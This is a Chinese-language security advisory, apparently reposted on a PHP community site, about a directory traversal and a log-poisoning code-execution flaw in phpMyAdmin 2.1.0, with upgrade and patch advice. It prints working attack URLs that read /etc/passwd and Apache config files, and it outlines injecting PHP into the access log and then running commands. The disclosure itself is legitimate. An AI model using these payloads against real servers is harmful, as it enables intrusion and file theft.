phpMyAdmin2.1.0存在两个漏洞
<p>phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 <a href="http://www.phpchina.com/javascript:;" onClick="javascript:tagshow(event, 'MySQL');" target="_self"><u><strong>MySQL</strong></u></a> <a href="http://www.phpchina.com/javascript:;" onClick="javascript:tagshow(event, '%CA%FD%BE%DD%BF%E2');" target="_self"><u><strong>数据库</strong></u></a>的 <a href="http://www.phpchina.com/javascript:;" onClick="javascript:tagshow(event, 'PHP');" target="_self"><u><strong>PHP</strong></u></a> 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本: <BR>phpMyAdmin 2.2.0。 <BR><BR><BR><BR>1、目录遍历漏洞 <BR><BR>攻击者通过提供如下的 URL: <BR><BR>http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*) <BR><BR>http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd <BR><BR>能非法访问系统文件 <BR><BR>有问题的<a href="http://www.phpchina.com/javascript:;" onClick="javascript:tagshow(event, '%B4%FA%C2%EB');" target="_self"><u><strong>代码</strong></u></a>在: <BR>'include($goto);' in sql.php and in tbl_replace.php. <BR><BR>2、执行攻击者代码漏洞 <BR><BR>通过使用全局可写<a href="http://www.phpchina.com/javascript:;" onClick="javascript:tagshow(event, '%C8%D5%D6%BE');" target="_self"><u><strong>日志</strong></u></a>文件,攻击者能在受影响服务器上执行任意代码。 <BR><BR>首先,得到 <a href="http://www.phpchina.com/javascript:;" onClick="javascript:tagshow(event, 'Apache');" target="_self"><u><strong>Apache</strong></u></a> 配置文件以便知道日志文件存储位置: <BR><BR>http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No <BR>http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No <BR>http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No <BR><BR>可以看出,日志放在: <BR>/var/log/httpd/error_log <BR>/var/log/httpd/access_log <BR><BR>然后 telnet 到 端口80 <BR><BR># telnet www.example.com 80 <BR>Trying xxx.xxx.xxx.xxx... <BR>Connected to www.example.com. <BR>Escape character is '^]'. <BR>GET <BR><BR><BR>^] <BR>telnet> quit <BR>Connection closed. <BR># <BR><BR>在 GET 请求之后,攻击者能将任意 PHP 代码上传 <BR><BR>现在,可以用 Apache 用户身份远程运行命令了: <BR><BR>http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/ <BR>access_log&btnDrop=No?meters=ls%20-l%20/ <BR><BR>受影响系统: <BR>phpMyAdmin 2.1.0 <BR><BR>解决方案: <BR>建议: <BR>1.使用 phpMyAdmin 2.2.0 <BR>http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz <BR>2.用户下载安装补丁: <BR>http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff <BR><BR></p> <center><input type="image" onclick=copyToClipBoard() src="http://www.phpchina.com/images/phpcn_book_bu_tj.gif" border="0"></center>
